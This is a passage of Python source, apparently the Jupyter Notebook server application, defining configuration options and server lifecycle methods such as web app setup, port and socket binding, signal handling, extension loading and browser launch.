jinja_template_vars = Dict(
config=True,
help=_("Extra variables to supply to jinja templates when rendering."),
)
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
@observe('enable_mathjax')
def _update_enable_mathjax(self, change):
"""set mathjax url to empty if mathjax is disabled"""
if not change['new']:
self.mathjax_url = u''
base_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
@validate('base_url')
def _update_base_url(self, proposal):
value = proposal['value']
if not value.startswith('/'):
value = '/' + value
if not value.endswith('/'):
value = value + '/'
return value
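    # Illustrative note (not part of the upstream source): the validator above normalises
    # the value, so '--NotebookApp.base_url=nb' and '--NotebookApp.base_url=/nb/' both end
    # up as '/nb/', and every handler is then served under that prefix (e.g. '/nb/tree').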
base_project_url = Unicode('/', config=True, help=_("""DEPRECATED use base_url"""))
@observe('base_project_url')
def _update_base_project_url(self, change):
self.log.warning(_("base_project_url is deprecated, use base_url"))
self.base_url = change['new']
extra_static_paths = List(Unicode(), config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
        or overriding individual files in the notebook's default static files."""
)
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
static_custom_path = List(Unicode(),
help=_("""Path to search for custom.js, css""")
)
@default('static_custom_path')
def _default_static_custom_path(self):
return [
os.path.join(d, 'custom') for d in (
self.config_dir,
DEFAULT_STATIC_FILES_PATH)
]
extra_template_paths = List(Unicode(), config=True,
help=_("""Extra paths to search for serving jinja templates.
Can be used to override templates from notebook.templates.""")
)
@property
def template_file_path(self):
"""return extra paths + the default locations"""
return self.extra_template_paths + DEFAULT_TEMPLATE_PATH_LIST
extra_nbextensions_path = List(Unicode(), config=True,
help=_("""extra paths to look for Javascript notebook extensions""")
)
extra_services = List(Unicode(), config=True,
help=_("""handlers that should be loaded at higher priority than the default services""")
)
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = self.extra_nbextensions_path + jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
websocket_url = Unicode("", config=True,
help="""The base URL for websockets,
if it differs from the HTTP server (hint: it almost certainly doesn't).
Should be in the form of an HTTP origin: ws[s]://hostname[:port]
"""
)
mathjax_url = Unicode("", config=True,
help="""A custom url for MathJax.js.
Should be in the form of a case-sensitive url to MathJax,
for example: /static/components/MathJax/MathJax.js
"""
)
@default('mathjax_url')
def _default_mathjax_url(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.tornado_settings.get("static_url_prefix", "static")
return url_path_join(static_url_prefix, 'components', 'MathJax', 'MathJax.js')
@observe('mathjax_url')
def _update_mathjax_url(self, change):
new = change['new']
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info(_("Using MathJax: %s"), new)
mathjax_config = Unicode("TeX-AMS-MML_HTMLorMML-full,Safe", config=True,
help=_("""The MathJax.js configuration file that is to be used.""")
)
@observe('mathjax_config')
def _update_mathjax_config(self, change):
self.log.info(_("Using MathJax configuration file: %s"), change['new'])
quit_button = Bool(True, config=True,
help="""If True, display a button in the dashboard to quit
        (shut down the notebook server)."""
)
# We relax this trait to handle Contents Managers using jupyter_server
# as the core backend.
contents_manager_class = TypeFromClasses(
default_value=LargeFileManager,
klasses=[
ContentsManager,
# To make custom ContentsManagers both forward+backward
# compatible, we'll relax the strictness of this trait
# and allow jupyter_server contents managers to pass
# through. If jupyter_server is not installed, this class
# will be ignored.
'jupyter_server.contents.services.managers.ContentsManager'
],
config=True,
help=_('The notebook manager class to use.')
)
# Throws a deprecation warning to jupyter_server based contents managers.
@observe('contents_manager_class')
def _observe_contents_manager_class(self, change):
new = change['new']
# If 'new' is a class, get a string representing the import
# module path.
if inspect.isclass(new):
new = new.__module__
if new.startswith('jupyter_server'):
self.log.warning(
"The specified 'contents_manager_class' class inherits a manager from the "
"'jupyter_server' package. These (future-looking) managers are not "
"guaranteed to work with the 'notebook' package. For longer term support "
"consider switching to NBClassic—a notebook frontend that leverages "
"Jupyter Server as its server backend."
)
kernel_manager_class = Type(
default_value=MappingKernelManager,
klass=MappingKernelManager,
config=True,
help=_('The kernel manager class to use.')
)
session_manager_class = Type(
default_value=SessionManager,
config=True,
help=_('The session manager class to use.')
)
config_manager_class = Type(
default_value=ConfigManager,
config = True,
help=_('The config manager class to use')
)
kernel_spec_manager = Instance(KernelSpecManager, allow_none=True)
kernel_spec_manager_class = Type(
default_value=KernelSpecManager,
config=True,
help="""
The kernel spec manager class to use. Should be a subclass
of `jupyter_client.kernelspec.KernelSpecManager`.
        The API of KernelSpecManager is provisional and might change
without warning between this version of Jupyter and the next stable one.
"""
)
login_handler_class = Type(
default_value=LoginHandler,
klass=web.RequestHandler,
config=True,
help=_('The login handler class to use.'),
)
logout_handler_class = Type(
default_value=LogoutHandler,
klass=web.RequestHandler,
config=True,
help=_('The logout handler class to use.'),
)
trust_xheaders = Bool(False, config=True,
help=(_("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL"))
)
info_file = Unicode()
@default('info_file')
def _default_info_file(self):
info_file = "nbserver-%s.json" % os.getpid()
return os.path.join(self.runtime_dir, info_file)
browser_open_file = Unicode()
@default('browser_open_file')
def _default_browser_open_file(self):
basename = "nbserver-%s-open.html" % os.getpid()
return os.path.join(self.runtime_dir, basename)
pylab = Unicode('disabled', config=True,
help=_("""
DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
""")
)
@observe('pylab')
def _update_pylab(self, change):
"""when --pylab is specified, display a warning and exit"""
if change['new'] != 'warn':
backend = ' %s' % change['new']
else:
backend = ''
self.log.error(_("Support for specifying --pylab on the command line has been removed."))
self.log.error(
_("Please use `%pylab{0}` or `%matplotlib{0}` in the notebook itself.").format(backend)
)
self.exit(1)
notebook_dir = Unicode(config=True,
help=_("The directory to use for notebooks and kernels.")
)
@default('notebook_dir')
def _default_notebook_dir(self):
if self.file_to_run:
return os.path.dirname(os.path.abspath(self.file_to_run))
else:
return py3compat.getcwd()
@validate('notebook_dir')
def _notebook_dir_validate(self, proposal):
value = proposal['value']
# Strip any trailing slashes
# *except* if it's root
_, path = os.path.splitdrive(value)
if path == os.sep:
return value
value = value.rstrip(os.sep)
if not os.path.isabs(value):
# If we receive a non-absolute path, make it absolute.
value = os.path.abspath(value)
if not os.path.isdir(value):
raise TraitError(trans.gettext("No such notebook dir: '%r'") % value)
return value
# TODO: Remove me in notebook 5.0
server_extensions = List(Unicode(), config=True,
help=(_("DEPRECATED use the nbserver_extensions dict instead"))
)
@observe('server_extensions')
def _update_server_extensions(self, change):
self.log.warning(_("server_extensions is deprecated, use nbserver_extensions"))
self.server_extensions = change['new']
nbserver_extensions = Dict({}, config=True,
help=(_("Dict of Python modules to load as notebook server extensions."
"Entry values can be used to enable and disable the loading of"
"the extensions. The extensions will be loaded in alphabetical "
"order."))
)
reraise_server_extension_failures = Bool(
False,
config=True,
help=_("Reraise exceptions encountered loading server extensions?"),
)
iopub_msg_rate_limit = Float(1000, config=True, help=_("""(msgs/sec)
Maximum rate at which messages can be sent on iopub before they are
limited."""))
iopub_data_rate_limit = Float(1000000, config=True, help=_("""(bytes/sec)
Maximum rate at which stream output can be sent on iopub before they are
limited."""))
rate_limit_window = Float(3, config=True, help=_("""(sec) Time window used to
check the message and data rate limits."""))
shutdown_no_activity_timeout = Integer(0, config=True,
help=("Shut down the server after N seconds with no kernels or "
"terminals running and no activity. "
"This can be used together with culling idle kernels "
"(MappingKernelManager.cull_idle_timeout) to "
"shutdown the notebook server when it's not in use. This is not "
"precisely timed: it may shut down up to a minute later. "
"0 (the default) disables this automatic shutdown.")
)
terminals_enabled = Bool(True, config=True,
help=_("""Set to False to disable terminals.
This does *not* make the notebook server more secure by itself.
        Anything the user can do in a terminal, they can also do in a notebook.
Terminals may also be automatically disabled if the terminado package
is not available.
"""))
authenticate_prometheus = Bool(
True,
help=""""
Require authentication to access prometheus metrics.
"""
).tag(config=True)
@default('authenticate_prometheus')
def _default_authenticate_prometheus(self):
""" Authenticate Prometheus by default, unless auth is disabled. """
auth = bool(self.password) or bool(self.token)
if auth is False:
self.log.info(_("Authentication of /metrics is OFF, since other authentication is disabled."))
return auth
@observe('authenticate_prometheus')
def _update_authenticate_prometheus(self, change):
        # By the time this observer runs, the trait already holds the new value,
        # so compare the old value with the new one.
        if change['old'] is True and change['new'] is False:
            self.log.info(_("Authentication of /metrics is being turned OFF."))
# Since use of terminals is also a function of whether the terminado package is
# available, this variable holds the "final indication" of whether terminal functionality
# should be considered (particularly during shutdown/cleanup). It is enabled only
# once both the terminals "service" can be initialized and terminals_enabled is True.
# Note: this variable is slightly different from 'terminals_available' in the web settings
# in that this variable *could* remain false if terminado is available, yet the terminal
    # service's initialization still fails. As a result, this variable is the authoritative indicator.
terminals_available = False
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
arg0 = self.extra_args[0]
f = os.path.abspath(arg0)
self.argv.remove(arg0)
if not os.path.exists(f):
self.log.critical(_("No such file or directory: %s"), f)
self.exit(1)
# Use config here, to ensure that it takes higher priority than
# anything that comes from the config dirs.
c = Config()
if os.path.isdir(f):
c.NotebookApp.notebook_dir = f
elif os.path.isfile(f):
c.NotebookApp.file_to_run = f
self.update_config(c)
def init_configurables(self):
# If gateway server is configured, replace appropriate managers to perform redirection. To make
# this determination, instantiate the GatewayClient config singleton.
self.gateway_config = GatewayClient.instance(parent=self)
if self.gateway_config.gateway_enabled:
self.kernel_manager_class = 'notebook.gateway.managers.GatewayKernelManager'
self.session_manager_class = 'notebook.gateway.managers.GatewaySessionManager'
self.kernel_spec_manager_class = 'notebook.gateway.managers.GatewayKernelSpecManager'
self.kernel_spec_manager = self.kernel_spec_manager_class(
parent=self,
)
self.kernel_manager = self.kernel_manager_class(
parent=self,
log=self.log,
connection_dir=self.runtime_dir,
kernel_spec_manager=self.kernel_spec_manager,
)
# Ensure the appropriate version of Python and jupyter_client is available.
if isinstance(self.kernel_manager, AsyncMappingKernelManager):
if not async_kernel_mgmt_available: # Can be removed once jupyter_client >= 6.1 is required.
raise ValueError("You are using `AsyncMappingKernelManager` without an appropriate "
"jupyter_client installed! Please upgrade jupyter_client or change kernel managers.")
self.log.info("Asynchronous kernel management has been configured to use '{}'.".
format(self.kernel_manager.__class__.__name__))
self.contents_manager = self.contents_manager_class(
parent=self,
log=self.log,
)
self.session_manager = self.session_manager_class(
parent=self,
log=self.log,
kernel_manager=self.kernel_manager,
contents_manager=self.contents_manager,
)
self.config_manager = self.config_manager_class(
parent=self,
log=self.log,
)
def init_logging(self):
        # This prevents double log messages because tornado uses a root logger that
        # self.log is a child of. The logging module dispatches log messages to a logger
        # and all of its ancestors until propagate is set to False.
self.log.propagate = False
for log in app_log, access_log, gen_log:
# consistent log output name (NotebookApp instead of tornado.access, etc.)
log.name = self.log.name
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_resources(self):
"""initialize system resources"""
if resource is None:
self.log.debug('Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)')
return
old_soft, old_hard = resource.getrlimit(resource.RLIMIT_NOFILE)
soft = self.min_open_files_limit
hard = old_hard
if old_soft < soft:
if hard < soft:
hard = soft
self.log.debug(
'Raising open file limit: soft {}->{}; hard {}->{}'.format(old_soft, soft, old_hard, hard)
)
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.tornado_settings['allow_origin'] = self.allow_origin
self.tornado_settings['websocket_compression_options'] = self.websocket_compression_options
if self.allow_origin_pat:
self.tornado_settings['allow_origin_pat'] = re.compile(self.allow_origin_pat)
self.tornado_settings['allow_credentials'] = self.allow_credentials
self.tornado_settings['autoreload'] = self.autoreload
self.tornado_settings['cookie_options'] = self.cookie_options
self.tornado_settings['get_secure_cookie_kwargs'] = self.get_secure_cookie_kwargs
self.tornado_settings['token'] = self.token
# ensure default_url starts with base_url
if not self.default_url.startswith(self.base_url):
self.default_url = url_path_join(self.base_url, self.default_url)
if self.password_required and (not self.password):
self.log.critical(_("Notebook servers are configured to only be run with a password."))
self.log.critical(_("Hint: run the following command to set a password"))
self.log.critical(_("\t$ python -m notebook.auth password"))
sys.exit(1)
# Socket options validation.
if self.sock:
if self.port != DEFAULT_NOTEBOOK_PORT:
self.log.critical(
_('Options --port and --sock are mutually exclusive. Aborting.'),
)
sys.exit(1)
else:
# Reset the default port if we're using a UNIX socket.
self.port = 0
if self.open_browser:
# If we're bound to a UNIX socket, we can't reliably connect from a browser.
self.log.info(
_('Ignoring --NotebookApp.open_browser due to --sock being used.'),
)
if self.file_to_run:
self.log.critical(
_('Options --NotebookApp.file_to_run and --sock are mutually exclusive.'),
)
sys.exit(1)
if sys.platform.startswith('win'):
self.log.critical(
_('Option --sock is not supported on Windows, but got value of %s. Aborting.' % self.sock),
)
sys.exit(1)
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.contents_manager,
self.session_manager, self.kernel_spec_manager,
self.config_manager, self.extra_services,
self.log, self.base_url, self.default_url, self.tornado_settings,
self.jinja_environment_options,
)
ssl_options = self.ssl_options
if self.certfile:
ssl_options['certfile'] = self.certfile
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
if self.client_ca:
ssl_options['ca_certs'] = self.client_ca
if not ssl_options:
# None indicates no SSL config
ssl_options = None
else:
# SSL may be missing, so only import it if it's to be used
import ssl
# PROTOCOL_TLS selects the highest ssl/tls protocol version that both the client and
# server support. When PROTOCOL_TLS is not available use PROTOCOL_SSLv23.
# PROTOCOL_TLS is new in version 2.7.13, 3.5.3 and 3.6
ssl_options.setdefault(
'ssl_version',
getattr(ssl, 'PROTOCOL_TLS', ssl.PROTOCOL_SSLv23)
)
if ssl_options.get('ca_certs', False):
ssl_options.setdefault('cert_reqs', ssl.CERT_REQUIRED)
self.login_handler_class.validate_security(self, ssl_options=ssl_options)
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders,
max_body_size=self.max_body_size,
max_buffer_size=self.max_buffer_size)
success = self._bind_http_server()
if not success:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
self.exit(1)
def _bind_http_server(self):
return self._bind_http_server_unix() if self.sock else self._bind_http_server_tcp()
def _bind_http_server_unix(self):
if unix_socket_in_use(self.sock):
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
try:
sock = bind_unix_socket(self.sock, mode=int(self.sock_mode.encode(), 8))
self.http_server.add_socket(sock)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on sock %s denied") % self.sock)
return False
else:
raise
else:
return True
def _bind_http_server_tcp(self):
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
eacces = (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES))
if sys.platform == 'cygwin':
# Cygwin has a bug that causes EPERM to be returned in this
# case instead of EACCES:
# https://cygwin.com/ml/cygwin/2019-04/msg00160.html
eacces += (errno.EPERM,)
if e.errno == errno.EADDRINUSE:
if self.port_retries:
self.log.info(_('The port %i is already in use, trying another port.') % port)
else:
self.log.info(_('The port %i is already in use.') % port)
continue
elif e.errno in eacces:
self.log.warning(_("Permission to listen on port %i denied.") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
if self.port_retries:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
else:
self.log.critical(_('ERROR: the notebook server could not be started because '
'port %i is not available.') % port)
self.exit(1)
return success
def _concat_token(self, url):
token = self.token if self._token_generated else '...'
return url_concat(url, {'token': token})
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
elif self.sock:
url = self._unix_sock_url()
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._tcp_url(ip)
if self.token and not self.sock:
url = self._concat_token(url)
if not self.custom_display_url:
url += '\n or %s' % self._concat_token(self._tcp_url('127.0.0.1'))
return url
@property
def connection_url(self):
if self.sock:
return self._unix_sock_url()
else:
ip = self.ip if self.ip else 'localhost'
return self._tcp_url(ip)
def _unix_sock_url(self, token=None):
return '%s%s' % (urlencode_unix_socket(self.sock), self.base_url)
def _tcp_url(self, ip, port=None):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i%s" % (proto, ip, port or self.port, self.base_url)
def init_terminals(self):
if not self.terminals_enabled:
return
try:
from .terminal import initialize
initialize(nb_app=self)
self.terminals_available = True
except ImportError as e:
self.log.warning(_("Terminals not available (error was %s)"), e)
def init_signal(self):
if not sys.platform.startswith('win') and sys.stdin and sys.stdin.isatty():
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info(_('interrupted'))
# Check if answer_yes is set
if self.answer_yes:
self.log.critical(_("Shutting down..."))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.io_loop.add_callback_from_signal(self.io_loop.stop)
return
print(self.notebook_info())
yes = _('y')
no = _('n')
sys.stdout.write(_("Shutdown this notebook server (%s/[%s])? ") % (yes, no))
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith(yes) and no not in line.lower():
self.log.critical(_("Shutdown confirmed"))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.io_loop.add_callback_from_signal(self.io_loop.stop)
return
else:
print(_("No answer for 5s:"), end=' ')
print(_("resuming operation..."))
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
self.io_loop.add_callback_from_signal(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical(_("received signal %s, stopping"), sig)
self.io_loop.add_callback_from_signal(self.io_loop.stop)
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
# TODO: this should still check, but now we use bower, not git submodule
pass
def init_server_extension_config(self):
"""Consolidate server extensions specified by all configs.
The resulting list is stored on self.nbserver_extensions and updates config object.
The extension API is experimental, and may change in future releases.
"""
# TODO: Remove me in notebook 5.0
for modulename in self.server_extensions:
# Don't override disable state of the extension if it already exist
# in the new traitlet
if not modulename in self.nbserver_extensions:
self.nbserver_extensions[modulename] = True
# Load server extensions with ConfigManager.
# This enables merging on keys, which we want for extension enabling.
# Regular config loading only merges at the class level,
# so each level (user > env > system) clobbers the previous.
config_path = jupyter_config_path()
if self.config_dir not in config_path:
# add self.config_dir to the front, if set manually
config_path.insert(0, self.config_dir)
manager = ConfigManager(read_config_path=config_path)
section = manager.get(self.config_file_name)
extensions = section.get('NotebookApp', {}).get('nbserver_extensions', {})
for modulename, enabled in sorted(extensions.items()):
if modulename not in self.nbserver_extensions:
self.config.NotebookApp.nbserver_extensions.update({modulename: enabled})
self.nbserver_extensions.update({modulename: enabled})
def init_server_extensions(self):
"""Load any extensions specified by config.
Import the module, then call the load_jupyter_server_extension function,
if one exists.
The extension API is experimental, and may change in future releases.
"""
for modulename, enabled in sorted(self.nbserver_extensions.items()):
if enabled:
try:
mod = importlib.import_module(modulename)
func = getattr(mod, 'load_jupyter_server_extension', None)
if func is not None:
func(self)
except Exception:
if self.reraise_server_extension_failures:
raise
self.log.warning(_("Error loading server extension %s"), modulename,
exc_info=True)
def init_mime_overrides(self):
# On some Windows machines, an application has registered incorrect
# mimetypes in the registry.
# Tornado uses this when serving .css and .js files, causing browsers to
# reject these files. We know the mimetype always needs to be text/css for css
# and application/javascript for JS, so we override it here
# and explicitly tell the mimetypes to not trust the Windows registry
if os.name == 'nt':
# do not trust windows registry, which regularly has bad info
mimetypes.init(files=[])
# ensure css, js are correct, which are required for pages to function
mimetypes.add_type('text/css', '.css')
mimetypes.add_type('application/javascript', '.js')
# for python <3.8
mimetypes.add_type('application/wasm', '.wasm')
def shutdown_no_activity(self):
"""Shutdown server on timeout when there are no kernels or terminals."""
km = self.kernel_manager
if len(km) != 0:
return # Kernels still running
if self.terminals_available:
term_mgr = self.web_app.settings['terminal_manager']
if term_mgr.terminals:
return # Terminals still running
seconds_since_active = \
(utcnow() - self.web_app.last_activity()).total_seconds()
self.log.debug("No activity for %d seconds.",
seconds_since_active)
if seconds_since_active > self.shutdown_no_activity_timeout:
self.log.info("No kernels or terminals for %d seconds; shutting down.",
seconds_since_active)
self.stop()
def init_shutdown_no_activity(self):
if self.shutdown_no_activity_timeout > 0:
self.log.info("Will shut down after %d seconds with no kernels or terminals.",
self.shutdown_no_activity_timeout)
pc = ioloop.PeriodicCallback(self.shutdown_no_activity, 60000)
pc.start()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado <6.1 is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overrideable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8) and tornado.version_info < (6, 1):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
@catch_config_error
def initialize(self, argv=None):
self._init_asyncio_patch()
super().initialize(argv)
self.init_logging()
if self._dispatching:
return
self.init_resources()
self.init_configurables()
self.init_server_extension_config()
self.init_components()
self.init_webapp()
self.init_terminals()
self.init_signal()
self.init_server_extensions()
self.init_mime_overrides()
self.init_shutdown_no_activity()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext('Shutting down %d kernel', 'Shutting down %d kernels', n_kernels)
self.log.info(kernel_msg % n_kernels)
run_sync(self.kernel_manager.shutdown_all())
def cleanup_terminals(self):
"""Shutdown all terminals.
The terminals will shutdown themselves when this process no longer exists,
but explicit shutdown allows the TerminalManager to cleanup.
"""
if not self.terminals_available:
return
terminal_manager = self.web_app.settings['terminal_manager']
n_terminals = len(terminal_manager.list())
terminal_msg = trans.ngettext('Shutting down %d terminal', 'Shutting down %d terminals', n_terminals)
self.log.info(terminal_msg % n_terminals)
run_sync(terminal_manager.terminate_all())
def notebook_info(self, kernel_count=True):
"Return the current working directory and the server url information"
info = self.contents_manager.info_string() + "\n"
if kernel_count:
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext("%d active kernel", "%d active kernels", n_kernels)
info += kernel_msg % n_kernels
info += "\n"
# Format the info so that the URL fits on a single line in 80 char display
info += _("Jupyter Notebook {version} is running at:\n{url}".
format(version=NotebookApp.version, url=self.display_url))
if self.gateway_config.gateway_enabled:
info += _("\nKernels will be managed by the Gateway server running at:\n%s") % self.gateway_config.url
return info
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'sock': self.sock,
'secure': bool(self.certfile),
'base_url': self.base_url,
'token': self.token,
'notebook_dir': os.path.abspath(self.notebook_dir),
'password': bool(self.password),
'pid': os.getpid(),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
try:
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2, sort_keys=True)
except OSError as e:
self.log.error(_("Failed to write server-info to %s: %s"),
self.info_file, e)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def write_browser_open_file(self):
"""Write an nbserver-<pid>-open.html file
This can be used to open the notebook in a browser
"""
# default_url contains base_url, but so does connection_url
open_url = self.default_url[len(self.base_url):]
with open(self.browser_open_file, 'w', encoding='utf-8') as f:
self._write_browser_open_file(open_url, f)
def _write_browser_open_file(self, url, fh):
if self.token:
url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, url)
jinja2_env = self.web_app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url))
def remove_browser_open_file(self):
"""Remove the nbserver-<pid>-open.html file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.browser_open_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
if not self.use_redirect_file:
uri = self.default_url[len(self.base_url):]
if self.token:
uri = url_concat(uri, {'token': self.token})
if self.file_to_run:
if not os.path.exists(self.file_to_run):
self.log.critical(_("%s does not exist") % self.file_to_run)
self.exit(1)
relpath = os.path.relpath(self.file_to_run, self.notebook_dir)
uri = url_escape(url_path_join('notebooks', *relpath.split(os.sep)))
# Write a temporary file to open in the browser
fd, open_file = tempfile.mkstemp(suffix='.html')
with open(fd, 'w', encoding='utf-8') as fh:
self._write_browser_open_file(uri, fh)
else:
open_file = self.browser_open_file
if self.use_redirect_file:
assembled_url = urljoin('file:', pathname2url(open_file))
else:
assembled_url = url_path_join(self.connection_url, uri)
b = lambda: browser.open(assembled_url, new=self.webbrowser_open_new)
threading.Thread(target=b).start()
def start(self):
""" Start the Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
super().start()
if not self.allow_root:
# check if we are running as root, and abort if it's not allowed
try:
uid = os.geteuid()
except AttributeError:
uid = -1 # anything nonzero here, since we can't check UID assume non-root
if uid == 0:
self.log.critical(_("Running as root is not recommended. Use --allow-root to bypass."))
self.exit(1)
info = self.log.info
for line in self.notebook_info(kernel_count=False).split("\n"):
info(line)
info(_("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation)."))
if 'dev' in notebook.__version__:
info(_("Welcome to Project Jupyter! Explore the various tools available"
" and their corresponding documentation. If you are interested"
" in contributing to the platform, please visit the community"
"resources section at https://jupyter.org/community.html."))
self.write_server_info_file()
self.write_browser_open_file()
if (self.open_browser or self.file_to_run) and not self.sock:
self.launch_browser()
if self.token and self._token_generated:
# log full URL with generated token, so there's a copy/pasteable link
# with auth info.
if self.sock:
self.log.critical('\n'.join([
'\n',
'Notebook is listening on %s' % self.display_url,
'',
(
'UNIX sockets are not browser-connectable, but you can tunnel to '
'the instance via e.g.`ssh -L 8888:%s -N user@this_host` and then '
'open e.g. %s in a browser.'
) % (self.sock, self._concat_token(self._tcp_url('localhost', 8888)))
]))
else:
if not self.custom_display_url:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste one of these URLs:',
' %s' % self.display_url,
]))
else:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste this URL:',
' %s' % self.display_url,
]))
self.io_loop = ioloop.IOLoop.current()
if sys.platform.startswith('win'):
# add no-op to wake every 5s
# to handle signals that may be ignored by the inner loop
pc = ioloop.PeriodicCallback(lambda : None, 5000)
pc.start()
try:
self.io_loop.start()
except KeyboardInterrupt:
info(_("Interrupted..."))
finally:
self.remove_server_info_file()
self.remove_browser_open_file()
self.cleanup_kernels()
self.cleanup_terminals()
def stop(self):
def _stop():
self.http_server.stop()
self.io_loop.stop()
self.io_loop.add_callback(_stop)
def list_running_servers(runtime_dir=None):
"""Iterate over the server info files of running notebook servers.
Given a runtime directory, find nbserver-* files in the security directory,
and yield dicts of their information, each one pertaining to
a currently running notebook server instance.
"""
if runtime_dir is None:
runtime_dir = jupyter_runtime_dir()
# The runtime dir might not exist
if not os.path.isdir(runtime_dir):
return
for file_name in os.listdir(runtime_dir):
